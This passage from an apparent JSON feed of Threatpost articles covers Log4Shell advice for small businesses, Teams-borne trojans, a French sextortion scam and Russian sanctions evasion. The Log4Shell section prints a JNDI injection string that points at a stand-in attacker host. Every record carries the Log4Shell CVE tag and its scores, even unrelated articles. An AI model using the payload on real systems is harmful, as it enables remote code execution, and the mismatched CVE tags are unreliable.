product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:44", "description": "Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found.\n\nIn January, researchers at Avanan, a Check Point Company, began tracking the campaign, which drops malicious executable files in Teams conversations that, when clicked on, eventually take over the user\u2019s computer, according to [a report](<https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations>) published Thursday.\n\n\u201cUsing an executable file, or a file that contains instructions for the system to execute, hackers can install DLL files and allow the program to self-administer and take control over the computer,\u201d cybersecurity researcher and analyst at Avanan Jeremy Fuchs wrote in a report. \u201cBy attaching the file to a Teams attack, hackers have found a new way to easily target millions of users.\u201d\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nCybercriminals long have targeted Microsoft\u2019s ubiquitous document-creation and sharing suite \u2013 the legacy Office and its cloud-based version, [Office 365](<https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/>) \u2013 with attacks against individual apps in the suite such as [PowerPoint](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) as well as [business email compromise](<https://threatpost.com/microsoft-365-bec-innovation/163508/>) and other scams.\n\nNow Microsoft Teams \u2013 a business communication and collaboration suite \u2013 is emerging as an [increasingly popular attack surface](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) for cybercriminals, Fuchs said.\n\nThis interest could be attributed to its surge in use over the COVID-19 pandemic, as many organization\u2019s employees working remotely relied on the app to collaborate. Indeed, the number of daily active users of Teams [nearly doubled](<blank>) over the past year, increasing from 75 million users in April 2020 to 145 million as of the second quarter of 2021, according to Statista.\n\nThe latest campaign against Teams demonstrates an increased understanding of the collaboration app that will allow attacks against it to increase in both sophistication and volume, Fuchs noted. \u201cAs Teams usage continues to increase, Avanan expects a significant increase in these sorts of attacks,\u201d he wrote.\n\n## **Taking on Teams**** **\n\nIn order to plant malicious documents in Teams, researchers first have to get access to the application, Fuchs noted. This is possible in a number of ways, typically involving an initial [email compromise](<https://threatpost.com/microsoft-teams-tabs-bec/166909/>) through phishing to gain credentials or other access to a network, he said.\n\n\u201cThey can compromise a partner organization and listen in on inter-organizational chats,\u201d Fuchs wrote. \u201cThey can compromise an email address and use that to access Teams. They can steal Microsoft 365 credentials, giving them carte blanche access to Teams and the rest of the Office suite.\u201d\n\nOnce an attacker gains access to Teams, it\u2019s fairly easy to navigate and slip past any security protections, he noted. This is because \u201cdefault Teams protections are lacking, as scanning for malicious links and files is limited,\u201d and \u201cmany email security solutions do not offer robust protection for Teams,\u201d Fuchs wrote.\n\nAnother reason Teams is easy for hackers to compromise is that end users inherently trust the platform, sharing sensitive and even confidential data with abandon while using it, he said.\n\n\u201cFor example, an Avanan analysis of hospitals that use Teams found that doctors share patient medical information practically with no limits on the Teams platform,\u201d Fuchs wrote. \u201cMedical staff generally know the security rules and risk of sharing information via email, but ignore those when it comes to Teams. In their mind, everything can be sent on Teams.\u201d\n\nFurther, nearly every Teams user can invite people from other departments or other companies to collaborate via the platform, and there is often \u201cminimal oversight\u201d over these requests because of the trust people have, he added.\n\n## **Specific Attack Vector**\n\nIn the attack vector Avanan researchers observed, attackers first access Teams through one of the aforementioned ways, such as a phishing email that spoofs a user, or through a lateral attack on the network.\n\nThen, the threat actor attaches a .exe file to a chat \u2013 called \u201cUser Centric\u201d \u2013 that is actually a trojan. To the end user, it looks legitimate, because it appears to be coming from a trusted user.\n\n\u201cWhen someone attaches a file to a Teams chat, particularly with the innocuous-sounding file name of \u2018User Centric,\u2019 many users won\u2019t think twice and will click on it,\u201d Fuchs wrote.\n\nIf that happens, the executable will then install DLL files that install malware as a Windows program and create shortcut links to self-administer on the victim\u2019s machine, he said. The ultimate goal of the malware is to take over control of the machine and perform other nefarious activities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:11:48", "type": "threatpost", "title": "Microsoft Teams Targeted With Takeover Trojans", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:11:48", "id": "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "href": "https://threatpost.com/microsoft-teams-targeted-takeover-trojans/178497/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one signal of what may be a resurgence, they said.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:23:28", "description": "Russia may ramp up ransomware attacks against the United States as a way to ease the financial hurt it\u2019s under due to sanctions, U.S. federal authorities are warning. Those sanctions have been levied against the nation and Vladimir Putin\u2019s government due to its invasion of Ukraine.\n\nThe Financial Crimes Enforcement Network (FinCEN) issued a FinCEN Alert [(PDF)](<https://www.fincen.gov/sites/default/files/2022-03/FinCEN%20Alert%20Russian%20Sanctions%20Evasion%20FINAL%20508.pdf>) on Wednesday advising all financial institutions to remain vigilant against potential efforts to evade the expansive sanctions and other U.S.-imposed restrictions related to the current conflict. One way this may be done is to move cryptocurrency funds through ransomware payments collected after Russian state-sponsored actors carry out cyberattacks.\n\n\u201cIn the face of mounting economic pressure on Russia, it is vitally important for U.S. financial institutions to be vigilant about potential Russian sanctions evasion, including by both state actors and oligarchs,\u201d said FinCEN Acting Director Him Das [in a press statement.](<https://www.fincen.gov/news/news-releases/fincen-provides-financial-institutions-red-flags-potential-russian-sanctions>)\n\nFinancial actions taken against Russia by the U.S. Department of the Treasury\u2019s Office of Foreign Assets Control (OFAC) since the nation\u2019s invasion of Ukraine last month are numerous. They include:\n\n * Sanctions against persons who have financial operations in the Russian Federation, including Putin and Russia\u2019s Minister of Foreign Affairs Sergei Lavrov\n * Prohibitions on correspondent or payable-through account and payment processing and blocking of certain Russian financial institutions\n * Prohibitions related to new debt and equity for certain Russian entities\n * A prohibition on transactions involving certain Russian government entities, including the Central Bank of the Russian Federation.\n\nFinCEN now is urging financial institutions \u2013 including those with visibility into cryptocurrency or convertible virtual currency (CVC) flows, such as CVC exchangers and administrators \u2013 to identify and report suspicious activity associated with potential sanctions evasion quickly and conduct an investigation where appropriate.\n\nSo far FinCEN has not seen widespread evasion of sanctions using methods such as cryptocurrency, Das noted. However, \u201cprompt reporting of suspicious activity\u201d can ensure this remains the case to support U.S. efforts and interest in supporting Ukraine.\n\n## **Ramp-Up in Cyber-Attacks **\n\nIndeed, Russia state-sponsored actors already have ramped up cyber-attacks since the beginning of the conflict in the Ukraine; thus, an increase in ransomware activity is not an entirely unlikely prospect.\n\nResearchers at Google\u2019s Threat Analysis Group (TAG) [reported earlier this week](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) that they had observed advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government stepping up phishing attacks against Ukrainian and European targets, as well as distributed denial-of-service (DDoS) attacks against key government and service-oriented Ukrainian websites.\n\nBecause it is not regulated by typical financial currency laws in the United States, cryptocurrency has become a method of choice for cybercriminals to conduct transactions \u2013 including receiving payouts after ransomware attacks. For this reason, it also could be used by Russia to get around U.S. sanctions, noted one security professional.\n\n\u201cFor the tech savvy or oligarch with a need to move money, they can hire the talent to move the transactions,\u201d Rosa Smothers, senior vice president of cyber operations at security firm [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkOYxa_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYuYvpXdvb7-2BNsZCUHkZXL7ec2QLTY2-2FTBe03G8iVYPixd8Bov5GgH6DAKHGUqexQ-2B0nAYVFKMqkBKYw8YYPqfJNrlxOwOTBqCCKReqy6Kmv5Y9-2FNHt4zLkJVstDtTRBPXtmuX1dxVZT3q5fhWHsXeqv-2Fv1cJIX-2Fjlb-2FKnRhdADS-2BgZa5auC32i8V3U0ThbubhxXsqpIt03Hz1cjPy4L3tEOEdvhmz3jLvNd846SsHu-2Fk-3D>) and a former CIA cyber threat analyst and technical intelligence officer, observed in an email to Threatpost.\n\nHowever, while cryptocurrency does provide privacy for storage and process transactions, \u201cthe transparency provided by blockchain could make the movement of large amounts of cryptocurrency detectable by law enforcement,\u201d she noted, citing how the Department of Justice was able to [seize millions of dollars in Bitcoin](<https://threatpost.com/fbi-claws-back-millions-darksides-ransom/166705/>) that Colonial Pipeline paid to the DarkSide group after [a highly disruptive ransomware attack](<https://threatpost.com/pipeline-crippled-ransomware/165963/>) last May.\n\nIndeed, another security professional expressed doubt that Russia could use ransomware payments or any other type of cryptocurrency transactions to evade U.S. sanctions \u201cat any meaningful scale.\u201d\n\n\u201cThe magnitude of the recent sanction reaches into the billions, amounts that are large enough to be unattainable for almost all cryptocurrencies currently,\u201d observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel. \u201cThere may be opportunities at the individual level, but for the scale of nation-state operations and expenditures, a few million or even tens of millions aren\u2019t really going to move the needle.\u201d\n\nLike Smothers, he also noted that the transparency of blockchain technology due to its nature as \u201ca public ledger\u201d makes it easier for financial authorities to observe and trace suspicious cryptocurrency transactions than if sanctioned entities used \u201ctraditional money-laundering means.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:10:04", "type": "threatpost", "title": "Russia May Use Ransomware Payouts to Avoid Sanctions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:10:04", "id": "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "href": "https://threatpost.com/russia-ransomware-payouts-avoid-sanctions/178854/", "cvss": {"score": 9.3, "vector": 